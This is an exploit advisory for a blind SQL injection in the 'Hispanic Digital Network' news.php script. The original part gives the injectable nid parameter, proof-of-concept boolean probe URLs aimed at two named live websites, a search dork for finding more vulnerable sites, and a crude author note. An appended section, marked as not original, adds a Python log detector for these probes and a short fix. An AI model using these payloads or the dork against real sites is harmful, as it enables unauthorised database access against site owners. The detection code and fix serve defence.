Hispanic Digital Network Blind SQL Injection Vuln

[o] Hispanic Digital Network Blind SQL Injection Vulnerability
Software : Hispanic Digital Network
Vendor : http://www.hdnweb.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Vulnerable file
news.php

[o] Exploit
http://localhost/[path]/news.php?nid=[Blind SQL]

[o] Proof of Concept
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4 -> false
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5 -> true
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=4 -> false
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=5 -> true
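
Added example (not part of the original advisory): a log check for the probe pattern shown in the Proof of Concept. It flags non-numeric nid values on news.php and clients that repeat one injected condition with a different compared constant and get different page sizes back. The log lines, IP addresses, response sizes and the combined log format are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2010:10:00:01 +0000] "GET /news.php?nid=517 HTTP/1.1" 200 8123
203.0.113.7 - - [10/Jan/2010:10:00:05 +0000] "GET /news.php?nid=517+and+substring(@@version,1,1)=4 HTTP/1.1" 200 1532
203.0.113.7 - - [10/Jan/2010:10:00:06 +0000] "GET /news.php?nid=517+and+substring(@@version,1,1)=5 HTTP/1.1" 200 8123
198.51.100.9 - - [10/Jan/2010:10:02:11 +0000] "GET /news.php?nid=493 HTTP/1.1" 200 7710
198.51.100.9 - - [10/Jan/2010:10:02:15 +0000] "GET /index.php?page=2 HTTP/1.1" 200 4410
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')

def suspicious_nid_requests(log_text):
    """Return (client_ip, decoded nid, response size) for non-numeric nid values."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target, _status, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/news.php"):
            continue
        # parse_qs splits on the first '=' only and decodes '+' to a space.
        for nid in parse_qs(url.query, keep_blank_values=True).get("nid", []):
            if not re.fullmatch(r"[0-9]+", nid):  # a news id should be digits only
                hits.append((ip, nid, int(size)))
    return hits

def boolean_probe_clients(hits):
    """Clients whose requests differ only in the trailing constant but differ in size."""
    sizes_by_stem = {}
    for ip, nid, size in hits:
        stem = re.sub(r"\d+\s*$", "", nid)  # drop the compared constant (=4 / =5)
        sizes_by_stem.setdefault((ip, stem), set()).add(size)
    return sorted({ip for (ip, _), sizes in sizes_by_stem.items() if len(sizes) > 1})

if __name__ == "__main__":
    found = suspicious_nid_requests(SAMPLE_LOG)
    for ip, nid, size in found:
        print(f"non-numeric nid from {ip}: {nid!r} ({size} bytes)")
    print("boolean-probe clients:", boolean_probe_clients(found))
```

The same digits-only rule applied to nid before it reaches the query (or binding it as an integer parameter) is what closes the hole in news.php.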

[o] Dork
"powered by Hispanic Digital Network"


[o] Notes
fucking private script again and all targets are on one IP address. lol
